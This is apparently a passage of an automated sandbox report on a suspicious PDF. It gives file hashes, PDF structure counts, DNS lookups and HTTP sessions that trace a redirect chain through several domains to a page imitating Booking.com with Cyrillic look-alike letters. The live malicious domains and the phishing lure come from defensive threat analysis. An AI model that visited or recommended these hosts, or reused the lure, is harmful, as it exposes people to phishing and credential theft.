Preview:	2025/01/16-11:19:34.042 efc Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/16-11:19:34.045 efc Recovering log #3.2025/01/16-11:19:34.045 efc Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jan 16 15:19:57 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9833148919733823
Encrypted:	false
SSDEEP:	48:85dijTG90qfHAidAKZdA19ehwiZUklqehHy+3:8mj+0qGoy
MD5:	DEC37984717EE978EAEE0C6B1AE60DC4
SHA1:	AD958172DA407E0EDC12CE3837A03902548485A0
SHA-256:	1642DBB32855A93F9AAAFF7A70E397111E96235B067C4D83DA93E9916A860C72
SHA-512:	92D2F7FF8F6DFCB92746901E431C56C545D1CA531975B63EFC6A9AD49C2BFA3BBDED2B468CDC3EDCCAC55925C611F6A9A1B93AC676F4F2168D07DB1E8B038212
Malicious:	false
Preview:	L..................F.@.. ...$+.,.......{2h..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I0Zn.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V0Z{.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V0Z{.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V0Z{............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V0Z}............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

File type:	PDF document, version 1.3, 2 pages
Entropy (8bit):	7.908913376750146
TrID:	Adobe Portable Document Format (5005/1) 100.00%
File name:	iRMbIIEjhP.pdf
File size:	76'749 bytes
MD5:	d7b0ac7ee79ecf1fe26e54c89c5c7245
SHA1:	62b6b13f70d30c215d5f30d8ec23ed28a9a36cc2
SHA256:	5339ccf37589e64cee452ccf84b5b689c52a49b75d0244edb20dad60e99422dd
SHA512:	dc055c60f99e3172246855742bb85edc77b108f42f09c46d1c5ad4aa5c6db3df7aebd3ae1ea7844e541e11f9acb888151706b846507717ccb1a38795f74924bc
SSDEEP:	1536:zgF+E2tCYj47yqVbMqZ83q/ErxbQDzKVjoVqp1cN3Sthk8GNTMjX9vN:zOQtx4OuM+8aOxcqVj3rtqSN
TLSH:	AF73D0738E4D4C8AECE343F96E527D4EB5BDF22617D0B03634748AA62D4185C9D3236A
File Content Preview:	%PDF-1.3.1 0 obj.<<./Count 2./Kids [3 0 R.5 0 R]./MediaBox [0 0 595.28 841.89]./Type /Pages.>>.endobj.2 0 obj.<<./OpenAction [3 0 R /FitH null]./PageLayout /OneColumn./Pages 1 0 R./Type /Catalog.>>.endobj.3 0 obj.<<./Annots [<</A <</S /URI /URI (https://c

General
Header:	%PDF-1.3
Total Entropy:	7.908913
Total Bytes:	76749
Stream Entropy:	7.967237
Stream Bytes:	70362
Entropy outside Streams:	5.199464
Bytes outside Streams:	6387
Number of EOF found:	1
Bytes after EOF:

Name	Count
obj	37
endobj	37
stream	15
endstream	15
xref	1
trailer	1
startxref	1
/Page	2
/Encrypt	0
/ObjStm	0
/URI	4
/JS	0
/JavaScript	0
/AA	0
/OpenAction	1
/AcroForm	0
/JBIG2Decode	0
/RichMedia	0
/Launch	0
/EmbeddedFile	0

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 16, 2025 17:19:46.524384022 CET	61869	53	192.168.2.5	1.1.1.1
Jan 16, 2025 17:19:49.717590094 CET	53	62540	162.159.36.2	192.168.2.5
Jan 16, 2025 17:19:50.190320969 CET	64093	53	192.168.2.5	1.1.1.1
Jan 16, 2025 17:19:50.197423935 CET	53	64093	1.1.1.1	192.168.2.5
Jan 16, 2025 17:19:55.342595100 CET	62017	53	192.168.2.5	1.1.1.1
Jan 16, 2025 17:19:55.359750986 CET	53	62017	1.1.1.1	192.168.2.5
Jan 16, 2025 17:19:58.298247099 CET	56327	53	192.168.2.5	1.1.1.1
Jan 16, 2025 17:19:58.606905937 CET	53	56327	1.1.1.1	192.168.2.5
Jan 16, 2025 17:19:59.246424913 CET	65218	53	192.168.2.5	1.1.1.1
Jan 16, 2025 17:19:59.253405094 CET	53	65218	1.1.1.1	192.168.2.5
Jan 16, 2025 17:19:59.723119020 CET	59806	53	192.168.2.5	1.1.1.1
Jan 16, 2025 17:19:59.748259068 CET	53	59806	1.1.1.1	192.168.2.5
Jan 16, 2025 17:20:02.564882040 CET	52274	53	192.168.2.5	1.1.1.1
Jan 16, 2025 17:20:02.576097012 CET	53	52274	1.1.1.1	192.168.2.5
Jan 16, 2025 17:20:28.270253897 CET	53	64638	1.1.1.1	192.168.2.5
Jan 16, 2025 17:20:30.224010944 CET	53	51164	1.1.1.1	192.168.2.5
Jan 16, 2025 17:20:58.098023891 CET	53	55262	1.1.1.1	192.168.2.5
Jan 16, 2025 17:21:15.809983015 CET	50441	53	192.168.2.5	1.1.1.1
Jan 16, 2025 17:21:15.817101002 CET	53	50441	1.1.1.1	192.168.2.5

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 16, 2025 17:19:46.532126904 CET	1.1.1.1	192.168.2.5	0xa8e4	No error (0)	x1.i.lencr.org	crl.root-x1.letsencrypt.org.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 17:19:46.532126904 CET	1.1.1.1	192.168.2.5	0xa8e4	No error (0)	crl.root-x1.letsencrypt.org.edgekey.net	e8652.dscx.akamaiedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 17:19:46.532126904 CET	1.1.1.1	192.168.2.5	0xa8e4	No error (0)	e8652.dscx.akamaiedge.net		23.209.209.135	A (IP address)	IN (0x0001)	false
Jan 16, 2025 17:19:50.197423935 CET	1.1.1.1	192.168.2.5	0xd159	Name error (3)	241.42.69.40.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Jan 16, 2025 17:19:55.359750986 CET	1.1.1.1	192.168.2.5	0xce0	No error (0)	clintonmakes.com		66.63.187.216	A (IP address)	IN (0x0001)	false
Jan 16, 2025 17:19:58.606905937 CET	1.1.1.1	192.168.2.5	0x83a8	No error (0)	minedudiser.com		186.64.116.70	A (IP address)	IN (0x0001)	false
Jan 16, 2025 17:19:59.253405094 CET	1.1.1.1	192.168.2.5	0x9e84	No error (0)	www.google.com		216.58.212.164	A (IP address)	IN (0x0001)	false
Jan 16, 2025 17:19:59.748259068 CET	1.1.1.1	192.168.2.5	0x26d3	No error (0)	fixecondfirbook.info		104.21.94.195	A (IP address)	IN (0x0001)	false
Jan 16, 2025 17:19:59.748259068 CET	1.1.1.1	192.168.2.5	0x26d3	No error (0)	fixecondfirbook.info		172.67.168.162	A (IP address)	IN (0x0001)	false
Jan 16, 2025 17:20:02.576097012 CET	1.1.1.1	192.168.2.5	0x9ba8	No error (0)	q-xx.bstatic.com	xx.bstatic.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 17:20:02.576097012 CET	1.1.1.1	192.168.2.5	0x9ba8	No error (0)	xx.bstatic.com	cf.bstatic.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 17:20:02.576097012 CET	1.1.1.1	192.168.2.5	0x9ba8	No error (0)	cf.bstatic.com	d2i5gg36g14bzn.cloudfront.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 17:20:02.576097012 CET	1.1.1.1	192.168.2.5	0x9ba8	No error (0)	d2i5gg36g14bzn.cloudfront.net		18.245.31.129	A (IP address)	IN (0x0001)	false
Jan 16, 2025 17:20:02.576097012 CET	1.1.1.1	192.168.2.5	0x9ba8	No error (0)	d2i5gg36g14bzn.cloudfront.net		18.245.31.49	A (IP address)	IN (0x0001)	false
Jan 16, 2025 17:20:02.576097012 CET	1.1.1.1	192.168.2.5	0x9ba8	No error (0)	d2i5gg36g14bzn.cloudfront.net		18.245.31.53	A (IP address)	IN (0x0001)	false
Jan 16, 2025 17:20:02.576097012 CET	1.1.1.1	192.168.2.5	0x9ba8	No error (0)	d2i5gg36g14bzn.cloudfront.net		18.245.31.18	A (IP address)	IN (0x0001)	false
Jan 16, 2025 17:21:15.817101002 CET	1.1.1.1	192.168.2.5	0xc5da	No error (0)	a.nel.cloudflare.com		35.190.80.1	A (IP address)	IN (0x0001)	false

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 17:19:46.540605068 CET	115	OUT	GET / HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Microsoft-CryptoAPI/10.0 Host: x1.i.lencr.org
Jan 16, 2025 17:19:47.199028015 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Content-Type: application/pkix-cert Last-Modified: Fri, 04 Aug 2023 20:57:56 GMT ETag: "64cd6654-56f" Content-Disposition: attachment; filename="ISRG Root X1.der" Cache-Control: max-age=50388 Expires: Fri, 17 Jan 2025 06:19:35 GMT Date: Thu, 16 Jan 2025 16:19:47 GMT Content-Length: 1391 Connection: keep-alive Data Raw: 30 82 05 6b 30 82 03 53 a0 03 02 01 02 02 11 00 82 10 cf b0 d2 40 e3 59 44 63 e0 bb 63 82 8b 00 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 4f 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 29 30 27 06 03 55 04 0a 13 20 49 6e 74 65 72 6e 65 74 20 53 65 63 75 72 69 74 79 20 52 65 73 65 61 72 63 68 20 47 72 6f 75 70 31 15 30 13 06 03 55 04 03 13 0c 49 53 52 47 20 52 6f 6f 74 20 58 31 30 1e 17 0d 31 35 30 36 30 34 31 31 30 34 33 38 5a 17 0d 33 35 30 36 30 34 31 31 30 34 33 38 5a 30 4f 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 29 30 27 06 03 55 04 0a 13 20 49 6e 74 65 72 6e 65 74 20 53 65 63 75 72 69 74 79 20 52 65 73 65 61 72 63 68 20 47 72 6f 75 70 31 15 30 13 06 03 55 04 03 13 0c 49 53 52 47 20 52 6f 6f 74 20 58 31 30 82 02 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 02 0f 00 30 82 02 0a 02 82 02 01 00 ad e8 24 73 f4 14 37 f3 9b 9e 2b 57 28 1c 87 be dc b7 df 38 90 8c 6e 3c e6 57 a0 78 f7 75 c2 a2 fe f5 6a 6e f6 00 4f 28 db de 68 86 6c 44 93 b6 b1 63 fd 14 12 6b bf 1f d2 ea 31 9b 21 7e d1 33 [TRUNCATED] Data Ascii: 0k0S@YDcc0H0O10UUS1)0'U Internet Security Research Group10UISRG Root X10150604110438Z350604110438Z0O10UUS1)0'U Internet Security Research Group10UISRG Root X10"0H0$s7+W(8n<WxujnO(hlDck1!~3<Hy!KqiJffl~<p)"K~G\|H#S8Oo.IWt/8{p!u0<cOK~w.{JL%p)S$J?aQcq.o[\4ylv;by/&676urIAv5/(ldwnG7Y^hrA)>Y>&$ZL@F:Qn;}rxY>Qx/>{JKsP\|Ctt0[q600\H;}`)A\|;FHvvj=8d+(B"']ypN:'Qnd3COB0@0U0U00UyY{sXn0*HUX
Jan 16, 2025 17:19:47.199049950 CET	509	IN	Data Raw: a9 bc b2 a8 50 d0 0c b1 d8 1a 69 20 27 29 08 ac 61 75 5c 8a 6e f8 82 e5 69 2f d5 f6 56 4b b9 b8 73 10 59 d3 21 97 7e e7 4c 71 fb b2 d2 60 ad 39 a8 0b ea 17 21 56 85 f1 50 0e 59 eb ce e0 59 e9 ba c9 15 ef 86 9d 8f 84 80 f6 e4 e9 91 90 dc 17 9b 62 Data Ascii: Pi ')au\ni/VKsY!~Lq`9!VPYYbEf\|o;'}~"+"4[XT&3L-<W,N;1"ss993#L<U)"k;W:pMMl]+NEJ&rj

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 17:19:57.342762947 CET	468	OUT	GET /215c/ HTTP/1.1 Host: clintonmakes.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: f5510ad44=0ad448213ea0
Jan 16, 2025 17:19:58.238790035 CET	448	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 16:19:58 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked server: Apache/2.4.37 (Rocky Linux) Content-Encoding: gzip Data Raw: 66 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 91 b1 6e c3 20 10 86 5f 85 b2 78 72 69 33 a5 8e ed 25 cd dc 0e 59 3a 45 04 2e 36 aa 01 e7 38 da fa ed 4b 62 a7 b2 54 45 f2 c2 e9 a4 ef ff 38 b8 f2 e1 f5 6d bb ff 78 df b1 96 6c 57 97 d3 09 52 d7 25 19 ea a0 2e c5 54 2d 90 4c 14 f5 39 9c a3 f9 aa f8 d6 3b 02 47 f9 7e e8 81 33 35 76 15 27 f8 21 71 f1 6c 98 6a 25 06 a0 2a d2 29 5f f3 49 e1 a4 85 44 7d 1b 22 c0 42 49 d4 b3 70 88 d6 4a 1c 0e 9d c4 06 0e c6 ca 06 6e b9 1e 7d 0f 48 43 c5 7d 53 5c 67 9a e5 b8 f8 47 dd 6e 58 80 26 a1 86 a0 d0 f4 64 bc 5b a6 5d 1c 48 f2 f1 1d 33 ea ae f5 1e 39 fb f7 0c e1 84 10 da ec 8f ca 9e 36 2c 62 57 5d a0 50 08 61 8d 03 1d b5 09 80 8f ca 5b 71 f4 fe d3 e8 f5 6a f5 f2 9c a5 7d 8e db 3d 7a 3d a4 66 2a d7 bd b3 5f 9e 07 89 53 0e 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: fcn _xri3%Y:E.68KbTE8mxlWR%.T-L9;G~35v'!qlj%)_ID}"BIpJn}HC}S\gGnX&d[]H396,bW]Pa[qj}=z=f_S0
Jan 16, 2025 17:19:58.303672075 CET	381	OUT	GET /favicon.ico HTTP/1.1 Host: clintonmakes.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Referer: http://clintonmakes.com/215c/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Jan 16, 2025 17:19:58.643409014 CET	371	IN	HTTP/1.1 404 Not Found Date: Thu, 16 Jan 2025 16:19:58 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked server: Apache/2.4.37 (Rocky Linux) Content-Encoding: gzip Data Raw: 61 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d ce 4d 0f 82 30 0c 06 e0 bf 52 b9 4b d1 70 6c 76 90 8f 48 82 48 cc 38 78 c4 ac 04 12 64 c8 86 c6 7f ef 74 17 2f 4d da f7 c9 9b d2 26 3d 27 f2 5a 67 70 94 a7 12 ea e6 50 16 09 04 5b c4 22 93 39 62 2a 53 9f ec c3 08 31 ab 02 41 bd bd 8f 6e 72 ab 04 d9 c1 8e 2c e2 28 86 4a 5b c8 f5 3a 29 42 7f 24 f4 e4 a6 d5 db f1 9d f8 13 6e a3 59 c8 9e 61 e1 c7 ca c6 b2 82 e6 52 c2 ab 35 30 39 d6 7d 19 e8 09 6c 3f 18 30 bc 3c 79 09 09 67 57 ea eb f0 f7 04 7c 00 b6 fe c5 76 be 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a8MM0RKplvHH8xdt/M&='ZgpP["9b*S1Anr,(J[:)B$nYaR509}l?0<ygW\|v0

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 17:20:07.973032951 CET	212	IN	HTTP/1.0 408 Request Time-out Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 64 69 64 6e 27 74 20 73 65 6e 64 20 61 20 63 6f 6d 70 6c 65 74 65 20 72 65 71 75 65 73 74 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>408 Request Time-out</h1>Your browser didn't send a complete request in time.</body></html>
Jan 16, 2025 17:20:52.982129097 CET	6	OUT	Data Raw: 00 Data Ascii:

Timestamp	Bytes transferred	Direction	Data
2025-01-16 16:19:56 UTC	664	OUT	GET /215c/ HTTP/1.1 Host: clintonmakes.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-16 16:19:56 UTC	210	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 16:19:56 GMT Content-Type: text/html; charset=utf-8 Content-Length: 1070 Connection: close Set-Cookie: f5510ad44=0ad448213ea0 server: Apache/2.4.37 (Rocky Linux)
2025-01-16 16:19:56 UTC	829	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 63 61 72 64 22 20 63 6f 6e 74 65 6e 74 3d 22 73 75 6d 6d 61 72 79 5f 6c 61 72 67 65 5f 69 6d 61 67 65 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 3c 6d 65 74 61 20 70 72 6f Data Ascii: <!DOCTYPE html><html><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="twitter:card" content="summary_large_image"><meta property="og:title" content=""/><meta property="twitter:title" content=""/><meta pro

Timestamp	Bytes transferred	Direction	Data
2025-01-16 16:19:59 UTC	690	OUT	GET /bookid82291 HTTP/1.1 Host: minedudiser.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: http://clintonmakes.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-16 16:19:59 UTC	344	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 16 Jan 2025 16:19:59 GMT Server: Apache Strict-Transport-Security: max-age=63072000; includeSubdomains; Location: https://fixecondfirbook.info/ Cache-Control: max-age=0 Expires: Thu, 16 Jan 2025 16:19:59 GMT Content-Length: 237 Connection: close Content-Type: text/html; charset=iso-8859-1
2025-01-16 16:19:59 UTC	237	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 69 78 65 63 6f 6e 64 66 69 72 62 6f 6f 6b 2e 69 6e 66 6f 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://fixecondfirbook.info/">here</a>.</p></body></html>

Timestamp	Bytes transferred	Direction	Data
2025-01-16 16:20:00 UTC	684	OUT	GET / HTTP/1.1 Host: fixecondfirbook.info Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: http://clintonmakes.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-16 16:20:00 UTC	928	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 16:20:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: Express Accept-Ranges: bytes Cache-Control: public, max-age=0 Last-Modified: Tue, 07 Jan 2025 11:10:39 GMT cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FPGT6t4jqND62DCtOJhvTzdQQxB6vC7X6kfy05l3mnXJsynLlOsOhjiztnEBQElowIz3F1E%2BV%2BgIuWX%2FVHqpujBgfKVRETukb2y69ope283Y2jqepAAsphCFr79LR6%2B%2BvyPsMjY9GA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902f6e2f7d89ab06-YYZ alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13907&min_rtt=13900&rtt_var=5227&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=1262&delivery_rate=209169&cwnd=32&unsent_bytes=0&cid=8677651fe1467cb1&ts=383&x=0"
2025-01-16 16:20:00 UTC	441	IN	Data Raw: 33 33 36 37 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 42 d0 be d0 be 6b 69 6e 67 2e d1 81 d0 be 6d 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a Data Ascii: 3367<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Bking.m</title> <style> body { margin: 0; font-family: Arial, sans-serif;
2025-01-16 16:20:00 UTC	1369	IN	Data Raw: 74 3a 20 35 35 70 78 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 63 6f 6e 74 65 6e 74 20 7b 0a 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 34 30 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 2d 32 30 70 78 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 20 20 20 20 Data Ascii: t: 55px; justify-content: space-between; align-items: center; left: 0; } header h1 { margin: 0; font-size: 20px; } .content { max-width: 400px; margin: -20px auto; background: white;
2025-01-16 16:20:00 UTC	1369	IN	Data Raw: 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 34 35 70 78 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 66 6f 6f 74 65 72 20 61 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 37 31 63 32 3b 0a 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 66 6f 6f 74 65 72 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 72 20 7b 0a 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 61 6e 74 69 Data Ascii: x; margin-top: -45px; font-size: 12px; color: #666; } footer a { color: #0071c2; text-decoration: none; } footer a:hover { text-decoration: underline; } hr { -webkit-font-smoothing: anti
